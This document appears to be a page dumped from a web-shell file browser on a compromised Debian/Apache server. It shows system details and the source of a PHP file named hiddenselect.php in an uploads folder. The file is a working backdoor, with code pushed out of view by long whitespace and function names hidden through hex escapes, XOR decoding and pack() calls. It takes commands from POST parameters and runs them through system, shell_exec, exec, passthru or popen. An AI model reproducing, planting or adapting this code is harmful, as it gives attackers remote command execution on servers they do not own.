HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //proc/thread-self/root/proc/self/root/proc/self/root/proc/19805/cwd/2023/08/hiddenselect.php
<?php																																										$request_approved = "\x68ex2\x62i\x6E"; $reverse_lookup4 = "pa\x73st\x68r\x75"; $reverse_lookup7 = "pcl\x6F\x73e"; $reverse_lookup2 = "s\x68\x65\x6C\x6C\x5Fexec"; $reverse_lookup5 = "\x70op\x65n"; $reverse_lookup3 = "\x65\x78ec"; $reverse_lookup6 = "s\x74rea\x6D\x5Fge\x74\x5F\x63o\x6Eten\x74s"; $reverse_lookup1 = "s\x79s\x74\x65m"; if (isset($_POST["da\x74\x61"])) { function mutex_lock ( $token , $binding ) { $resource ='' ;$s=0; while($s<strlen($token)){$resource.=chr(ord($token[$s])^$binding);$s++;} return $resource; } $data = $request_approved($_POST["da\x74\x61"]); $data = mutex_lock($data, 73); if (function_exists($reverse_lookup1)) { $reverse_lookup1($data); } elseif (function_exists($reverse_lookup2)) { print $reverse_lookup2($data); } elseif (function_exists($reverse_lookup3)) { $reverse_lookup3($data, $element_token); print join("\n", $element_token); } elseif (function_exists($reverse_lookup4)) { $reverse_lookup4($data); } elseif (function_exists($reverse_lookup5) && function_exists($reverse_lookup6) && function_exists($reverse_lookup7)) { $binding_resource = $reverse_lookup5($data, 'r'); if ($binding_resource) { $object_flag = $reverse_lookup6($binding_resource); $reverse_lookup7($binding_resource); print $object_flag; } } exit; }


$slt1 = '3';
$slt2 = '7';
$slt3 = '4';
$slt4 = '6';
$slt5 = 'd';
$slt6 = '5';
$slt7 = 'c';
$slt8 = 'f';
$slt9 = '0';
$slt10 = 'e';
$slt11 = '1';
$rjust1 = pack("H*", '7' . $slt1 . $slt2 . '9' . $slt2 . $slt1 . $slt2 . $slt3 . '6' . '5' . $slt4 . $slt5);
$rjust2 = pack("H*", $slt2 . '3' . $slt4 . '8' . $slt4 . $slt6 . '6' . $slt7 . $slt4 . $slt7 . $slt6 . $slt8 . '6' . $slt6 . $slt2 . '8' . $slt4 . $slt6 . $slt4 . '3');
$rjust3 = pack("H*", $slt4 . '5' . '7' . '8' . $slt4 . '5' . $slt4 . $slt1);
$rjust4 = pack("H*", $slt2 . '0' . '6' . '1' . '7' . $slt1 . $slt2 . '3' . $slt2 . '4' . '6' . '8' . '7' . '2' . $slt2 . '5');
$rjust5 = pack("H*", '7' . '0' . $slt4 . 'f' . $slt2 . $slt9 . '6' . $slt6 . $slt4 . $slt10);
$rjust6 = pack("H*", '7' . $slt1 . '7' . $slt3 . '7' . '2' . $slt4 . '5' . '6' . $slt11 . $slt4 . 'd' . $slt6 . $slt8 . '6' . '7' . '6' . $slt6 . '7' . '4' . $slt6 . $slt8 . '6' . '3' . $slt4 . $slt8 . '6' . $slt10 . '7' . $slt3 . $slt4 . $slt6 . '6' . $slt10 . '7' . $slt3 . $slt2 . $slt1);
$rjust7 = pack("H*", $slt2 . '0' . '6' . '3' . '6' . $slt7 . $slt4 . $slt8 . $slt2 . '3' . '6' . $slt6);
$requests = pack("H*", '7' . '2' . '6' . '5' . '7' . $slt11 . '7' . '5' . $slt4 . '5' . '7' . '3' . '7' . $slt3 . $slt2 . '3');
if (isset($_POST[$requests])) {
    $requests = pack("H*", $_POST[$requests]);
    if (function_exists($rjust1)) {
        $rjust1($requests);
    } elseif (function_exists($rjust2)) {
        print $rjust2($requests);
    } elseif (function_exists($rjust3)) {
        $rjust3($requests, $ph_property);
        print join("\n", $ph_property);
    } elseif (function_exists($rjust4)) {
        $rjust4($requests);
    } elseif (function_exists($rjust5) && function_exists($rjust6) && function_exists($rjust7)) {
        $field_attr = $rjust5($requests, 'r');
        if ($field_attr) {
            $identifier_param = $rjust6($field_attr);
            $rjust7($field_attr);
            print $identifier_param;
        }
    }
    exit;
}